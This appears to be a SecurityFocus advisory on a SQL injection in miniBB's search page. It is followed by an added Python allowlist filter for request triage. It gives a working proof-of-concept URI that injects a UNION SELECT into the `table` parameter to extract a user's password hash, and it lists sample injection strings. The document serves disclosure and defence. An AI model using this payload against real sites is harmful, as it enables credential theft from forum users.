miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?action=search&where=3&searchGo=1&table=[SQL]
http://www.example.com/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username,0x20,user_password))/**/FROM/**/minibbtable_users/**/WHERE/**/user_id=1/*
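
The URIs above put SQL into the `table` parameter, a position where a bound query parameter cannot be used, so the practical control is to accept only allowlisted bare identifiers there. The Python below is an added example, not code from the advisory or from miniBB: it applies that check to request URIs, as an input filter or for log triage. The allowlist contents, function names and sample URIs are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the only table the search action should ever name.
ALLOWED_TABLES = {"minibbtable_posts"}
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def check_search_request(uri):
    """Classify one request URI by its `table` parameter.

    Returns (verdict, value): 'ignore' for non-search requests, 'ok',
    'unknown-table' for a bare identifier that is not allowlisted, or
    'not-identifier' for a value containing anything a table name never needs.
    """
    # parse_qs percent-decodes, so encoded and literal forms compare alike.
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    if "search" not in query.get("action", []) or "table" not in query:
        return ("ignore", None)
    values = query["table"]  # a repeated parameter yields several values
    for value in values:
        if not IDENTIFIER.fullmatch(value):
            return ("not-identifier", value)
    for value in values:
        if value not in ALLOWED_TABLES:
            return ("unknown-table", value)
    return ("ok", values[-1])


def triage(uris):
    """Return (verdict, uri) for every search request that should be rejected."""
    results = [(check_search_request(u)[0], u) for u in uris]
    return [(v, u) for v, u in results if v not in ("ok", "ignore")]


# Constructed sample request URIs (not taken from real logs).
SAMPLE_URIS = [
    "/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts",
    "/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/1/*",
    "/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts%2F%2A%2A%2FUNION",
    "/index.php?action=search&where=3&searchGo=1&table=minibbtable_users",
    "/index.php?action=vtopic&forum=1",
]

if __name__ == "__main__":
    for verdict, uri in triage(SAMPLE_URIS):
        print(f"{verdict:15} {uri}")
```
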


 

Copyright 2010, SecurityFocus